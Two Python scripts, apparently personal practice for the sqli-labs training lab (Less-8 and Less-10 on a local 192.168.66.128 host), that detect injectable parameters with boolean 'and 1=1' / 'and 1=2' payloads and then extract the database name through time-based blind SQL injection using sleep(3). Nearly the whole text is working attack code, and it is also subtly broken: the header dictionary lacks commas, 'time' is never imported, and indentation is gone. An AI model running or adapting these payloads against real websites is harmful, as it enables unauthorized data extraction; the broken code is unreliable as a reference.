#### 判断是否为整形注入
import requests
import re
header={
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,**;q=0.8"
"Accept-Encoding": "gzip, deflate, br"
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
"Connection": "keep-alive"
"cookie": "Hm_lvt_dd4738b5fb302cb062ef19107df5d2e4=1635672302,1635903472,1636200072,1637395585"
"Host": "newtab.firefoxchina.cn"
"Sec-Fetch-Dest": "document"
"Sec-Fetch-Mode": "navigate"
"Sec-Fetch-Site": "cross-site"
"Upgrade-Insecure-Requests": "1"
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
}
def is_quotes_inj(url):
quotes= ["'",'"',")","')",'")']
for quote in quotes:
true_url=url+quote+"%20and 1=1"+"--+"
fasle_url=url+quote+"%20and 1=2"+"--+"
url_responese=requests.get(url,headers=header)
true_url_response = requests.get(true_url,headers=header)
fasle_url_response = requests.get(fasle_url,headers=header)
if true_url_response.text!=fasle_url_response.text and fasle_url_response.text!=url_responese.text and url_responese.text==true_url_response.text :
print("this is a {} type of sql injection!".format(quote))
t=True
else :
print(true_url)
if t:
return True
else:
return False
url="http://192.168.66.128/sqli-labs-master/Less-10/?id=1"
is_quotes_inj(url)
#### 盲注获取数据
import requests
import re
header={
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,**;q=0.8"
"Accept-Encoding": "gzip, deflate, br"
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
"Connection": "keep-alive"
"cookie": "Hm_lvt_dd4738b5fb302cb062ef19107df5d2e4=1635672302,1635903472,1636200072,1637395585"
"Host": "newtab.firefoxchina.cn"
"Sec-Fetch-Dest": "document"
"Sec-Fetch-Mode": "navigate"
"Sec-Fetch-Site": "cross-site"
"Upgrade-Insecure-Requests": "1"
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
}
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWZYZ0123456789~!@#$%^&*()_+<>?"
url="http://192.168.66.128/sqli-labs-master/Less-8/?id=1"
length_payload="' and if(length(database())={},sleep(3),0)--+"
data_payload="' and if(ascii(substr(database(),{},1))={},sleep(3),0)--+"
def get_length(url,length_payload):
for x in range(1,50):
ex_url=url+length_payload.format(x)
start=time.time()
response = requests.get(ex_url,headers=header)
end=time.time()
print(end-start)
if (end-start) > 2 :
print("长度是"+str(x))
return x
length=get_length(url,length_payload)
def get_data(url,data_payload,length):
data=""
for x in range(1,length+1):
for char in chars:
ex_url=url+data_payload.format(x,ord(char))
start=time.time()
response = requests.get(ex_url,headers=header)
end=time.time()
if (end-start) > 2 :
data += char
print("数据是"+data)
return data
name=get_data(url,data_payload,length)
print(name)
